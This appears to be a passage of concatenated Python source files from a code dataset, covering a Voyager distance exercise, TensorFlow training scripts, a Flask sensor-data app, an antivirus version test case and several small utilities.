September 15, 1977, is the farthest-traveling Earthmade\nobject. It is presently on the outer edges of our solar system. The NASA update\npage on September 25, 2009, reported it as being a distance of approximately\n16,637,000,000 miles from the sun, traveling away from the sun at 38,241 miles/hour.\nWrite a program that will prompt the user for an integer number that indicates the\nnumber of days after 9/25/09. You will calculate the distance of Voyager from the sun\nusing the numbers from 9/25/09 (assume that velocity is constant) plus the entered\nnumber of days, and report:\n\u0002 Distance in miles\n\u0002 Distance in kilometers (1.609344 kilometers/mile)\nDistance in astronomical units (AU, 92,955,887.6 miles/AU)\n\u0002 Round-trip time for radio communication in hours. Radio waves travel at the speed\nof light, listed at 299,792,458 meters/second.\nhttp://voyager.jpl.nasa.gov/where/index.html\n\"\"\"\nfrom datetime import datetime\n\ndays_launch_now = (datetime.now() - datetime(1977, 9, 15)).days\ndays_launch_09 = (datetime(2009, 9, 25) - datetime(1977, 9, 15)).days\ndays_09_15 = (datetime.now() - datetime(2009, 9, 25)).days\ndistance_09 = 16637000000\ndistance_now = round(distance_09 / days_launch_09 * days_launch_now)\nprint(distance_now)\ndistance_km = round(distance_now * 1.609344)\nprint(distance_km)\ndistance_AU = round(distance_now / 92955887.6)\nprint(distance_AU)\n\nmiles_per_day = 38241 * 24\nnew_distance = days_launch_now * miles_per_day\nprint(round(new_distance))\nnew_km = 1.609344 * new_distance\nprint(new_km)\n\nmeter_hour = 299792458 * 3600\ntime_return = 1000 * new_km * 2 / meter_hour\n\nprint(time_return)","sub_path":"chapter 1/where_is_voyager.py","file_name":"where_is_voyager.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"298087694","text":"import tensorflow as tf\nimport pandas as pd\nimport numpy as np\nfrom read_datas import *\n\ndef deepnn(x):\n \"\"\"deepnn builds the graph for a deep net for classifying digits.\n\n Args:\n x: an input tensor with the dimensions (N_examples, 784), where 784 is the\n number of pixels in a standard MNIST image.\n\n Returns:\n A tuple (y, keep_prob). y is a tensor of shape (N_examples, 10), with values\n equal to the logits of classifying the digit into one of 10 classes (the\n digits 0-9). keep_prob is a scalar placeholder for the probability of\n dropout.\n \"\"\"\n # Reshape to use within a convolutional neural net.\n # Last dimension is for \"features\" - there is only one here, since images are\n # grayscale -- it would be 3 for an RGB image, 4 for RGBA, etc.\n with tf.name_scope('reshape'):\n x_image = tf.reshape(x, [-1, 6, 9, 1])\n\n # First convolutional layer - maps one grayscale image to 32 feature maps.\n with tf.name_scope('conv1'):\n W_conv1 = weight_variable([5, 5, 1, 32])\n b_conv1 = bias_variable([32])\n h_conv1 = tf.nn.relu(conv2d(x_image, W_conv1) + b_conv1)\n\n # Pooling layer - downsamples by 2X.\n with tf.name_scope('pool1'):\n h_pool1 = max_pool_2x2(h_conv1)\n\n # Second convolutional layer -- maps 32 feature maps to 64.\n with tf.name_scope('conv2'):\n W_conv2 = weight_variable([5, 5, 32, 64])\n b_conv2 = bias_variable([64])\n h_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2) + b_conv2)\n\n # Second pooling layer.\n with tf.name_scope('pool2'):\n h_pool2 = max_pool_2x2(h_conv2)\n\n # Fully connected layer 1 -- after 2 round of downsampling, our 28x28 image\n # is down to 7x7x64 feature maps -- maps this to 1024 features.\n with tf.name_scope('fc1'):\n W_fc1 = weight_variable([2 * 3 * 64, 1024])\n b_fc1 = bias_variable([1024])\n\n h_pool2_flat = tf.reshape(h_pool2, [-1, 2*3*64])\n h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1)\n\n # Dropout - controls the complexity of the model, prevents co-adaptation of\n # features.\n with tf.name_scope('dropout'):\n keep_prob = tf.placeholder(tf.float32)\n h_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)\n\n # Map the 1024 features to 10 classes, one for each digit\n with tf.name_scope('fc2'):\n W_fc2 = weight_variable([1024, 2])\n b_fc2 = bias_variable([2])\n\n y_conv = tf.matmul(h_fc1_drop, W_fc2) + b_fc2\n return y_conv, keep_prob\n\n\ndef conv2d(x, W):\n \"\"\"conv2d returns a 2d convolution layer with full stride.\"\"\"\n return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')\n\n\ndef max_pool_2x2(x):\n \"\"\"max_pool_2x2 downsamples a feature map by 2X.\"\"\"\n return tf.nn.max_pool(x, ksize=[1, 2, 2, 1],\n strides=[1, 2, 2, 1], padding='SAME')\n\n\ndef weight_variable(shape):\n \"\"\"weight_variable generates a weight variable of a given shape.\"\"\"\n initial = tf.truncated_normal(shape, stddev=0.1)\n return tf.Variable(initial)\n\n\ndef bias_variable(shape):\n \"\"\"bias_variable generates a bias variable of a given shape.\"\"\"\n initial = tf.constant(0.1, shape=shape)\n return tf.Variable(initial)\n\n\ndef main(_):\n # Import data\n df = pd.read_csv(\"data/train.csv\")\n\n # Create the model\n x = tf.placeholder(tf.float32, [None, 54])\n\n # Define loss and optimizer\n y_ = tf.placeholder(tf.float32, [None, 2])\n\n # Build the graph for the deep net\n y, keep_prob = deepnn(x)\n\n cross_entropy = tf.reduce_mean(\n tf.nn.softmax_cross_entropy_with_logits(labels=y_, logits=y))\n # cross_entropy = tf.reduce_mean(\n # tf.nn.sigmoid_cross_entropy_with_logits(labels=y_, logits=y))\n\n # train_step = tf.train.GradientDescentOptimizer(0.5).minimize(cross_entropy)\n train_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy)\n\n sess = tf.InteractiveSession()\n tf.global_variables_initializer().run()\n\n # Feature extraction\n feature_M, labels_M = preproceesing(df)\n # print feature_M[0:2], labels_M[0:2]\n\n step_size = 2000\n batch_size = 100\n\n # Train\n for i in range(step_size):\n batch_xs, batch_ys = feature_M[i*batch_size:(i+1)*batch_size], labels_M[i*batch_size:(i+1)*batch_size]\n sess.run(train_step, feed_dict={x: batch_xs, y_: batch_ys, keep_prob: 0.5})\n\n # Test trained model\n correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n acry_rate_t = 0.0\n for j in range((len(labels_M)-step_size*batch_size)//batch_size):\n i += 1\n acry_rate = sess.run(accuracy, feed_dict={x: feature_M[i*batch_size:(i+1)*batch_size],\n y_: labels_M[i*batch_size:(i+1)*batch_size],\n keep_prob: 0.5})\n acry_rate_t += acry_rate\n print(acry_rate)\n print(\"-- Accuracy in total:\",acry_rate_t/j)\n print('test accuracy %g' % accuracy.eval(feed_dict={\n x: feature_M[step_size*batch_size+1:], y_: labels_M[step_size*batch_size+1:], keep_prob: 1.0}))\n\n\nif __name__ == '__main__':\n tf.app.run(main=main)\n","sub_path":"training_model_deep.py","file_name":"training_model_deep.py","file_ext":"py","file_size_in_byte":5190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"353506293","text":"# main file for whole database program\n# it's a controller for whole thing - royce wilson\n\n# imports!\nfrom datetime import datetime\nimport time\nfrom flask import Flask, request, session, g, redirect, url_for, \\\n abort, render_template, flash, jsonify, Response, send_from_directory\nfrom werkzeug.routing import BaseConverter\nfrom db.db_init import connect_db, db_resource\nfrom xbeecom import xbeecom\nfrom models.sample import Samples\nimport sys\nimport os\nimport itertools\nimport operator\nimport logging\n\n\nlogging.basicConfig(format=\"[%(asctime)s %(name)s %(levelname)s] %(message)s\",\n filename=\"log.log\",\n level=logging.DEBUG)\n\n\n# creation!\napp = Flask(__name__)\napp.config.from_object('db.dbconfig')\n\n\nclass ListConverter(BaseConverter):\n def to_python(self, value):\n return value.split(\"+\")\n\n def to_url(self, values):\n return \"+\".join(map(BaseConverter.to_url, values))\napp.url_map.converters[\"list\"] = ListConverter\n\n\niso_format_string = \"%Y-%m-%dT%H:%M:%S\"\n@app.context_processor\ndef utility_processor():\n def format_date(time):\n return datetime.utcfromtimestamp(time).strftime(\"%Y-%m-%d %H:%M:%S\")\n return dict(format_date=format_date)\n\n\n@app.before_request\ndef before_request():\n g.db = connect_db(app)\n\n\n@app.teardown_request\ndef teardown_request(excetion):\n db = getattr(g, 'db', None)\n if db is not None:\n db.close()\n\n\n#@app.route('/')\ndef dashboard():\n recent_samples = Samples.get_status(g.db)\n recent_samples = [dict(zip(recent_samples[\"fields\"], sample))\n for sample in recent_samples[\"results\"]]\n for node in recent_samples:\n node[\"dt\"] = datetime.strptime(node[\"time\"], iso_format_string)\n node[\"delta\"] = datetime.now() - node[\"dt\"]\n return render_template('dashboard.html', nodes=recent_samples)\n\n\n@app.route('/')\ndef graph():\n recent_samples = Samples.get_status(g.db)\n recent_samples = [dict(zip(recent_samples[\"fields\"], sample))\n for sample in recent_samples[\"results\"]]\n return render_template('graph2.html', nodes=range(1,8))\n\n\n@app.route('/download', methods=['GET', 'POST'])\ndef download():\n if request.method == 'POST':\n try:\n nodes = [int(n.partition('-')[-1])\n for n in request.form.keys()\n if n.startswith('node-')]\n nodes = set(nodes) & set(range(1, 8))\n except ValueError:\n pass\n\n # strip field- off of post parameters\n fields = [f.partition('-')[-1]\n for f in request.form.keys()\n if f.startswith('field-')]\n # only include actual field names\n fields = set(fields) & set(Samples._fields)\n\n start_date = int(time.mktime(datetime.strptime(request.form['start'], '%m/%d/%Y').timetuple()))\n end_date = int(time.mktime(datetime.strptime(request.form['end'], '%m/%d/%Y').timetuple()))\n end_date += 60*60*24\n\n result = Samples.get_samples(g.db, start_date, end_date, nodes,\n [f for f in Samples._fields if f in fields])\n csv = ','.join(result['fields']) + '\\n'\n csv += '\\n'.join(','.join(map(str, row)) for row in result['results'])\n return Response(\n csv,\n mimetype=\"text/csv\",\n headers={\"Content-disposition\":\n \"attachment; filename=data.csv\"})\n else:\n return render_template('download.html', nodes=range(1,8), fields=Samples.descriptions)\n\n@app.route('/data/status')\ndef node_status():\n return jsonify(Samples.get_status(g.db))\n\n\n@app.route(\"/data\")\ndef get_samples():\n try:\n start_date = request.args.get(\"start\")\n if start_date is not None:\n start_date = int(start_date) / 1000\n\n end_date = request.args.get(\"end\")\n if end_date is not None:\n end_date = int(end_date) / 1000\n\n nodes = request.args.get(\"nodes\")\n if nodes is not None:\n nodes = tuple(set(map(int, (n for n in nodes.split(\"+\")))))\n\n y_axis = request.args.get(\"field_y\")\n x_axis = request.args.get(\"field_x\")\n fields = set((y_axis, x_axis)) & set(Samples._fields)\n fields |= set((\"n_id\",))\n if len(fields) != 3:\n return jsonify({\"error\": \"Invalid axes.\"})\n except ValueError as e:\n return jsonify({\"error\": \"Error parsing fields: {0}\".format(e)})\n\n samples = Samples.get_samples(g.db, start_date, end_date,\n nodes, fields, exact_time=False)\n node_id_offset = samples[\"fields\"].index(\"n_id\")\n groups = itertools.groupby(samples[\"results\"],\n operator.itemgetter(node_id_offset))\n y_axis_offset = samples[\"fields\"].index(y_axis)\n chart_response = {\n \"start\": start_date*1000,\n \"end\": end_date*1000,\n \"series\": {\n k: [(s.time*1000, s[y_axis_offset]) for s in g]\n for k, g in groups\n }\n }\n\n return jsonify(chart_response)\n\n@app.route(\"/database\")\ndef get_database():\n return send_from_directory(os.path.dirname(__file__), \"database.db\")\n\n\n# -----------------------------------------------\n\n\nif __name__ == '__main__':\n if len(sys.argv) > 1 and sys.argv[1] == \"demo\":\n logging.info(\"starting in demo mode\")\n app.run(debug=True, host='0.0.0.0')\n else:\n with xbeecom(db_resource(app)) as xbee:\n app.run(debug=False, host='0.0.0.0')\n","sub_path":"flaskr.py","file_name":"flaskr.py","file_ext":"py","file_size_in_byte":5491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"325084336","text":"import numpy as np\nimport pandas as pd\nimport tensorflow as tf\n\nimport networkx as nx\nfrom vis_py import *\nfrom itertools import chain\nimport matplotlib.pyplot as plt\nimport copy\n\n\n'''df = np.genfromtxt('./data/italy.csv', delimiter=',')\ndf = df.reshape(len(df), 1)\ntime = np.arange(len(df), dtype=int).reshape(len(df), 1)\ndf = np.concatenate([time, df], axis=1)\n\n\n\nfor t in range(100, 1000, 100):\n df_temp = df[t - 100:t, :]\n W = visibility_graph(df_temp, directed=False)\n # W = np.heaviside(W, 0).astype(int)\n\n import matplotlib.pylab as plt\n import scipy.sparse as sps\n\n M = sps.csr_matrix(W)\n plt.spy(M)\n plt.show()\n\n plt.plot(df_temp[:, 0], df_temp[:, 1] / max(df_temp[:, 1]))\n plt.plot(df_temp[:, 0], np.sum(W, axis=1) / max(np.sum(W, axis=1)))\n plt.show()\n\n G_weight = nx.convert_matrix.from_numpy_matrix(W, create_using=nx.Graph)\n W = np.heaviside(W, 0).astype(int)\n G_unweight = nx.convert_matrix.from_numpy_matrix(W, create_using=nx.Graph)\n\n nx.draw(G_unweight, node_size=1)\n plt.draw()\n plt.show()'''\n\n# Placeholders to feed train and test data into the graph.\n# Since batch dimension is 'None', we can reuse them both for train and eval.\nclass get_data():\n def __init__(self):\n df = np.genfromtxt('./data/italy.csv', delimiter=',')\n df = df.reshape(len(df), 1)\n self.T = len(df)\n time = np.arange(len(df), dtype=int).reshape(self.T, 1)\n\n df = np.concatenate([time, df], axis=1)\n feature_matrix = np.zeros(shape=(self.T - 100, 17))\n label_vector = np.zeros(shape=(self.T - 100, 1))\n #get visibility graphs\n for t in range(100, self.T, 1):\n print(t, df[t, 1])\n df_temp = df[t - 100:t, :]\n W = visibility_graph(df_temp, directed=False)\n G = nx.convert_matrix.from_numpy_matrix(W, create_using=nx.Graph)\n\n avg_degree, avg_strength, std_strength, avg_clustering, diameter, degree_correlation, eigen_max, degrees_to_print = get_measures(G, W)\n last_prices = df[(t - 5):t, 1]\n to_add = np.concatenate([[avg_degree, avg_strength, std_strength, avg_clustering, diameter, degree_correlation, eigen_max], degrees_to_print, last_prices])\n feature_matrix[t - 100, :] += to_add\n label_vector[t - 100, :] += df[t, 1]\n\n self.feature_matrix = feature_matrix\n self.label_vector = label_vector\n self.count = 0\n\n\n def __call__(self):\n\n to_return = self.feature_matrix[ self.count : (self.count+batch_size), :], self.label_vector[ self.count : (self.count+batch_size), :]\n self.count += 1\n return to_return\n\n\n def all(self):\n to_return = self.feature_matrix, self.label_vector\n return to_return\n\n\n\n\n\n '''TFdataset = tf.data.Dataset.from_tensor_slices((feature_matrix, label_vector))\n\n dataset = TFdataset.repeat().batch(batch_size)\n\n iter = dataset.make_one_shot_iterator()\n return iter'''\n\n\ndef get_placeholders():\n x = tf.placeholder(tf.float32, [None, 17])\n y_ = tf.placeholder(tf.float32, [None, 1])\n return x, y_\n\n# Store results of runs with different configurations in a list.\n# Use a tuple (num_epochs, learning_rate) as keys, and a tuple (training_accuracy, testing_accuracy)\nexperiments_task1 = []\nsettings = [(5, 0.0001)]#, (5, 0.005), (15, 0.1)]\nlog_period_samples = 100\nbatch_size = 50\n\nprint('Training Model')\n# Train Model 1 with the different hyper-parameter settings.\nfor (num_epochs, learning_rate) in settings:\n\n # Reset graph, recreate placeholders and dataset.\n tf.reset_default_graph()\n x, y_ = get_placeholders()\n mnist = get_data()\n\n #####################################################\n # Define model, loss, update and evaluation metric. #\n\n # initialise weight matrix and bias for fully connected linear layer\n W_0 = tf.get_variable(\"w0\", dtype=tf.float32, shape=[17, 10], initializer=tf.contrib.layers.xavier_initializer())\n b_0 = tf.get_variable(\"b0\", dtype=tf.float32, shape=[1, 10], initializer=tf.contrib.layers.xavier_initializer())\n\n y_0 = tf.matmul(x, W_0) + b_0\n\n #relu_0 = tf.nn.relu(y_0)\n\n # initialise weight matrix and bias for fully connected linear layer\n W_1 = tf.get_variable(\"w1\", dtype=tf.float32, shape=[10, 5], initializer=tf.contrib.layers.xavier_initializer())\n b_1 = tf.get_variable(\"b1\", dtype=tf.float32, shape=[1, 5], initializer=tf.contrib.layers.xavier_initializer())\n\n y_1 = tf.matmul(y_0, W_1) + b_1\n\n relu_1 = tf.nn.relu(y_1)\n\n # initialise weight matrix and bias for fully connected linear layer\n W_2 = tf.get_variable(\"w2\", dtype=tf.float32, shape=[5, 1], initializer=tf.contrib.layers.xavier_initializer())\n b_2 = tf.get_variable(\"b2\", dtype=tf.float32, shape=[1, 1], initializer=tf.contrib.layers.xavier_initializer())\n\n y_2 = tf.matmul(relu_1, W_2) + b_2\n\n relu_2 = tf.nn.relu(y_2)\n\n\n #model_softmax = tf.nn.softmax(y_0) # apply softmax to the linear layer\n\n loss = tf.losses.mean_squared_error(relu_2, y_) # compute cross-entropy loss on the linear output (softmax applied internally)\n\n\n\n update = tf.train.GradientDescentOptimizer(learning_rate=learning_rate).minimize(loss) # optimise to minimise loss via gradient descent\n\n #correct_preds = tf.equal(tf.argmax(model_softmax, 1), tf.argmax(y_, 1))\n get_accuracy = tf.metrics.mean_squared_error(relu_2, y_)\n\n get_prediction = [relu_2, y_]\n #get_accuracy = tf.reduce_mean(tf.cast(correct_preds, tf.float32)) # calculate the accuracy score\n\n #####################################################\n\n # Train.\n i, train_accuracy, test_accuracy = 0, [], []\n log_period_updates = int(log_period_samples / batch_size)\n with tf.train.MonitoredSession() as sess:\n while i < 1600:\n\n # Update.\n i += 1\n batch_xs, batch_ys = mnist()\n\n #################\n # Training step #\n sess.run(update, feed_dict={x: batch_xs, y_: batch_ys}) # run the gradient descent update\n\n #################\n\n # Periodically evaluate.\n if i % log_period_updates == 0:\n #####################################\n # Compute and store train accuracy. #\n\n temp_accuracy = sess.run(get_accuracy,\n feed_dict={x: batch_xs, y_: batch_ys}) # get the accuracy\n\n train_accuracy.append(temp_accuracy[1]) # append it to the list\n\n\n\n batch_xs, batch_ys = mnist.all()\n\n predictions = sess.run(get_prediction,\n feed_dict={x: batch_xs, y_: batch_ys})\n\n\n\n #####################################\n #experiments_task1.append(train_accuracy)\n #experiments_task1.append(\n #((num_epochs, learning_rate), train_accuracy, test_accuracy))\n'''train_plot = []\nfor i in train_accuracy:\n train_plot.append(i[1])\n\ntest_plot = []\nfor i in test_accuracy:\n test_plot.append(i[1])'''\n\nplt.plot(np.arange(len(train_accuracy)), train_accuracy, label = 'train')\nplt.legend()\n\nplt.show()\n\n'''pred_0 = []\npred_1 = []\nfor i in predictions[0]:\n pred_0.append(i)\nfor j in predictions[1]:\n pred_1.append(j)\nplt.plot(np.arange(len(pred_0)), pred_0, label = 'pred')\nplt.plot(np.arange(len(pred_1)), pred_1, label = 'label')\nplt.legend()\nplt.show()'''\nplt.plot(np.arange(len(predictions[0])), predictions[0], label = 'pred')\nplt.plot(np.arange(len(predictions[1])), predictions[1], label = 'label')\nplt.grid()\nplt.legend()\nplt.show()\n\n\nplt.plot(np.arange(len(predictions[0])), predictions[0], label = 'pred')\nplt.plot(np.arange(len(predictions[1])), predictions[1], label = 'label')\nplt.grid()\nplt.legend()\n\nplt.savefig('price_chart.eps', format='eps', dpi=1000)\n","sub_path":"ML_keep.py","file_name":"ML_keep.py","file_ext":"py","file_size_in_byte":7791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"356974814","text":"#!/usr/bin/env python\n# Copyright (C) 2010 McAfee, Inc. All rights reserved.\n# TestcaseID: lsh-1882\n# TestcaseDescription: Testcase to verify the installed version of VirusScan Enterprise for Linux\n\nimport sys\nimport logging\nimport re\n# Add common folder into the sys path for module importing\nsys.path.append(\"./Common\")\nsys.path.append(\"..\")\n#import commonFns\n#import commonOASFns\n#import commonAntiMalwareFns\nimport subprocess\n# Import CommonTest module into current namespace\nfrom CommonTest import *\n\n# Get testcase name\ntestcaseName = sys.argv[0][:-3]\n\nclass TestCase(BaseTest):\n def __init__(self):\n logging.info(\"Testcase ID : LSH-1882\")\n logging.info(\"Description : Testcase to verify the installed version of VirusScan Enterprise for Linux\")\n self.expected = '1.7.0'\n def init(self):\n logging.info(\"Initializing testcase %s\" % testcaseName)\n # Call the common initialization check\n _retval = BaseTest.init(self)\n if _retval != 0 :\n return _retval\n return 0\n\n def execute(self):\n logging.info(\"Executing testcase %s\" % testcaseName)\n try :\n _info = commonAntiMalwareFns.getProductInfo()\n if not _info :\n logging.error(\"Failed to retrieve product info\")\n return 1\n self._actual = _info['version']\n except :\n logging.error(\"Exception occured while running the task\")\n return 1\n return 0\n def verify(self):\n \n if self.expected == self._actual :\n logging.info(\"The installed product version matched with the exisiting version\")\n return 0\n else :\n logging.error(\"The installed build version(%s) does not match with the available built version(%s)\" %(self.line, self.productVersion))\n return 1\n return 0\n def cleanup(self):\n logging.info(\"Performing cleanup for testcase %s\" % testcaseName)\n \n # Copy logs and clean them.\n commonFns.cleanLogs()\n return 0\n\n def __del__(self):\n pass\n\nif __name__ == \"__main__\":\n # Setup testcase\n setupTestcase(sys.argv)\n\n testObj = TestCase()\n\n # Perform testcase operations\n retVal = testObj.init()\n\n # Perform execute once initialization succeeds... \n if(retVal == 0):\n retVal = testObj.execute()\n \n # Once execution succeeds, perform verification...\n if(retVal == 0):\n retVal = testObj.verify()\n\n # Perform testcase cleanup\n retVal = retVal + testObj.cleanup()\n\n if(retVal == 0):\n resultString = \"PASS\"\n else:\n resultString = \"FAIL\"\n \n logging.info(\"Result of testcase %s: %s\" % (testcaseName, resultString) )\n sys.exit(retVal)\n","sub_path":"McAfee/src/VSEL - TestAutomation/Testcases/Common/VselProductCheck.py","file_name":"VselProductCheck.py","file_ext":"py","file_size_in_byte":2764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"92062747","text":"#Oppgave 2.1\ni=1\ntallene = []\nwhile i !=0: #Naar bruker legg inn 0 lokken stopper\n\ti=int(input(\"legg inn:\\n\"))\n\ttallene.append(i)\n\tif i==0:\n\t\tprint(\"Funnet\")\n\n#Skriver ut taller i listen\nfor tall in tallene:\n\tprint(tall)\n\n#Skriver ut summen av tallene i listen\nminSum=0\nfor tall in tallene:\n\tminSum+=tall\nprint (\"Summen er: \"+str(minSum))\n\n#Skriver ut minstetallen i listen\nminstetall=tallene[0]\nfor tall in tallene:\n\tif tallstorstetall:\n\t\tstorstetall=tall\n\t\t\n#Printer minstetallen og storstetallen\nprint(\"Mistetallet er: \"+str(minstetall))\nprint(\"Størstetallet er: \"+str(storstetall))","sub_path":"IN1000 v17 Python/OBLIG4/regnelokke.py","file_name":"regnelokke.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"276679291","text":"# Copyright The IETF Trust 2019-2020, All Rights Reserved\n# -*- coding: utf-8 -*-\n\n\nfrom ietf.review.factories import ReviewAssignmentFactory, ReviewRequestFactory\nfrom ietf.utils.test_utils import TestCase, reload_db_objects\nfrom .mailarch import hash_list_message_id\n\nclass HashTest(TestCase):\n\n def test_hash_list_message_id(self):\n for list, msgid, hash in (\n ('ietf', '156182196167.12901.11966487185176024571@ietfa.amsl.com', 'lr6RtZ4TiVMZn1fZbykhkXeKhEk'),\n ('codesprints', 'E1hNffl-0004RM-Dh@zinfandel.tools.ietf.org', 'N1nFHHUXiFWYtdzBgjtqzzILFHI'),\n ('xml2rfc', '3A0F4CD6-451F-44E2-9DA4-28235C638588@rfc-editor.org', 'g6DN4SxJGDrlSuKsubwb6rRSePU'),\n (u'ietf', u'156182196167.12901.11966487185176024571@ietfa.amsl.com','lr6RtZ4TiVMZn1fZbykhkXeKhEk'),\n (u'codesprints', u'E1hNffl-0004RM-Dh@zinfandel.tools.ietf.org', 'N1nFHHUXiFWYtdzBgjtqzzILFHI'),\n (u'xml2rfc', u'3A0F4CD6-451F-44E2-9DA4-28235C638588@rfc-editor.org','g6DN4SxJGDrlSuKsubwb6rRSePU'),\n (b'ietf', b'156182196167.12901.11966487185176024571@ietfa.amsl.com','lr6RtZ4TiVMZn1fZbykhkXeKhEk'),\n (b'codesprints', b'E1hNffl-0004RM-Dh@zinfandel.tools.ietf.org', 'N1nFHHUXiFWYtdzBgjtqzzILFHI'),\n (b'xml2rfc', b'3A0F4CD6-451F-44E2-9DA4-28235C638588@rfc-editor.org','g6DN4SxJGDrlSuKsubwb6rRSePU'),\n ):\n self.assertEqual(hash, hash_list_message_id(list, msgid))\n \n\nclass ReviewAssignmentTest(TestCase):\n def do_test_update_review_req_status(self, assignment_state, expected_state):\n review_req = ReviewRequestFactory(state_id='assigned')\n ReviewAssignmentFactory(review_request=review_req, state_id='part-completed')\n assignment = ReviewAssignmentFactory(review_request=review_req)\n\n assignment.state_id = assignment_state\n assignment.save()\n review_req = reload_db_objects(review_req)\n self.assertEqual(review_req.state_id, expected_state)\n\n def test_update_review_req_status(self):\n # Test change\n for assignment_state in ['no-response', 'rejected', 'withdrawn', 'overtaken']:\n self.do_test_update_review_req_status(assignment_state, 'requested')\n # Test no-change\n for assignment_state in ['accepted', 'assigned', 'completed', 'part-completed', 'unknown', ]:\n self.do_test_update_review_req_status(assignment_state, 'assigned')\n\n def test_no_update_review_req_status_when_other_active_assignment(self):\n # If there is another still active assignment, do not update review_req state\n review_req = ReviewRequestFactory(state_id='assigned')\n ReviewAssignmentFactory(review_request=review_req, state_id='assigned')\n assignment = ReviewAssignmentFactory(review_request=review_req)\n\n assignment.state_id = 'no-response'\n assignment.save()\n review_req = reload_db_objects(review_req)\n self.assertEqual(review_req.state_id, 'assigned')\n\n def test_no_update_review_req_status_when_review_req_withdrawn(self):\n # review_req state must only be changed to \"requested\", if old state was \"assigned\",\n # to prevent reviving dead review requests\n review_req = ReviewRequestFactory(state_id='withdrawn')\n assignment = ReviewAssignmentFactory(review_request=review_req)\n\n assignment.state_id = 'no-response'\n assignment.save()\n review_req = reload_db_objects(review_req)\n self.assertEqual(review_req.state_id, 'withdrawn')\n","sub_path":"ietf/review/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"323573268","text":"import os\nimport sys\nimport json\nimport base64\nimport zipfile\nfrom imageio import imread, imwrite\n\nwith open(sys.argv[1]) as data_file:\n data = json.load(data_file)\n\nif not os.path.exists(sys.argv[1].split('.')[0] + \".json\"):\n cnt = 0\n check = []\n tmp = None\n d = {}\n for x in data[\"log\"][\"entries\"]:\n found = False\n if \"d2vs6ffylckc3p.cloudfront.net/manga\" in x[\"request\"][\"url\"]:\n found = True\n if not found:\n continue\n else:\n if \"content\" not in x[\"response\"]:\n continue\n elif x[\"response\"][\"content\"][\"mimeType\"] != \"image/jpeg\" or x[\"response\"][\"content\"][\"encoding\"] != \"base64\":\n continue\n else:\n if x[\"response\"][\"content\"][\"text\"] not in check:\n check.append(x[\"response\"][\"content\"][\"text\"])\n d[cnt] = x[\"response\"][\"content\"][\"text\"]\n cnt += 1\n\n json.dump(d, open(sys.argv[1].split('.')[0] + \".json\", \"w\"), indent=4, sort_keys=True)\n print(sys.argv[1].split('.')[0] + \".json\" + \" done.\")\n","sub_path":"HPJ/reduce.py","file_name":"reduce.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"403469171","text":"import typing\n\nimport pycspr.serialisation.byte_array.encoder.cl_complex as complex_encoder\nimport pycspr.serialisation.byte_array.encoder.cl_primitive as primitives_encoder\nimport pycspr.serialisation.byte_array.encoder.cl_type as type_encoder\nfrom pycspr.types import CLTypeKey\nfrom pycspr.types import CLValue\n\n\n\n# Map: CL type <-> encoder.\nENCODERS = {\n CLTypeKey.ANY: complex_encoder.encode_any,\n CLTypeKey.BOOL: primitives_encoder.encode_bool,\n CLTypeKey.BYTE_ARRAY: primitives_encoder.encode_byte_array,\n CLTypeKey.I32: primitives_encoder.encode_i32,\n CLTypeKey.I64: primitives_encoder.encode_i64,\n CLTypeKey.KEY: complex_encoder.encode_storage_key,\n CLTypeKey.LIST: complex_encoder.encode_list, \n CLTypeKey.MAP: complex_encoder.encode_map, \n CLTypeKey.OPTION: complex_encoder.encode_option, \n CLTypeKey.PUBLIC_KEY: complex_encoder.encode_public_key,\n CLTypeKey.STRING: primitives_encoder.encode_string,\n CLTypeKey.TUPLE_1: complex_encoder.encode_tuple1,\n CLTypeKey.TUPLE_2: complex_encoder.encode_tuple2,\n CLTypeKey.TUPLE_3: complex_encoder.encode_tuple3,\n CLTypeKey.U8: primitives_encoder.encode_u8,\n CLTypeKey.U32: primitives_encoder.encode_u32,\n CLTypeKey.U64: primitives_encoder.encode_u64,\n CLTypeKey.U128: primitives_encoder.encode_u128, \n CLTypeKey.U256: primitives_encoder.encode_u256,\n CLTypeKey.U512: primitives_encoder.encode_u512,\n CLTypeKey.UNIT: primitives_encoder.encode_unit,\n CLTypeKey.RESULT: complex_encoder.encode_result,\n CLTypeKey.UREF: complex_encoder.encode_uref,\n}\n\n\ndef encode(value: CLValue) -> bytes:\n \"\"\"Encodes a CL value as an array of bytes.\n\n :param value: A CL value that encapsulates both the associated CL type & it's pythonic value representation.\n :returns: A byte array representation conformant to CL serialisation protocol.\n \n \"\"\"\n encoder = ENCODERS[value.cl_type.typeof]\n if value.cl_type.typeof in {CLTypeKey.LIST, CLTypeKey.OPTION}:\n return encoder(value.parsed, ENCODERS[value.cl_type.inner_type.typeof])\n else:\n return encoder(value.parsed)\n\n\ndef encode_cl_value(entity: CLValue) -> bytes:\n \"\"\"Encodes a CL value.\n \n \"\"\"\n return primitives_encoder.encode_u8_array(encode(entity)) + \\\n type_encoder.encode_cl_type(entity.cl_type)\n","sub_path":"pycspr/serialisation/byte_array/encoder/cl_value.py","file_name":"cl_value.py","file_ext":"py","file_size_in_byte":2325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"575173597","text":"# standard libraries\nimport pygame\nimport sys\n\n# game 